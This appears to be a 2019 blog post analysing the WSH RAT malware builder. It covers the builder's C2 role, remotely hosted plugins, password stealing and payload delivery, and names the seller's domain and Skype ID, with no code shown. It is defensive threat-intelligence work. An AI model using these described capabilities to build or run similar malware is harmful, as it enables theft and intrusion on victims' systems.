Friday, October 4, 2019

WSH RAT - Analysis of the code

Analysis of the code - capabilities of WSH RAT

In previous post I wrote about the link between WSH RAT and some other crypter services so in this post I'm going to dig a bit in the analysis on the code.

In essence, WSH RAT generates malicious JS or VBS based on the HWorm, and a good write-up about the functionalities of version  2.0 of HWorm has been recently done by   in this post, but I will add a couple of interesting things.

WSH RAT builder

I took a look to one of the WSH RAT builders from a few months back (a version from July).
The builder acts as well as the C2.

The first interesting aspect is that the malicious payload, which it is HWorm, (both in VBS or JS) is included in the resources.

WSH RAT plugins

All the additional plugins for RDP, filemanager, offline-keylogger, etc, are linked to a URL which are part of the builder itself. This means that the plugins are allocated in a system owned by the developer of the builder, so the criminal using the builder doesn't have any control on the plugins being pushed to the infected system:

In the post from   the additional plugins are hosted in the domain "doughnut-snack[.]live" which is registered with the account  

Unknow.sales64 is the Skype ID of the person behind the builder who sells the service in wshsoftware[.]site

Password stealer

The password stealer capability is based on the PasswordStealer tool from @trestacon github

Download and Execute / Upload and Execute

WSH Rat is used to deploy additional malware. As mentioned previously, the builder is also acting as the C2. 

The additional payload can be pushed in two different ways: downloading the file from an external URL, or uploading the file through the WSH builder. Code for both methods are below: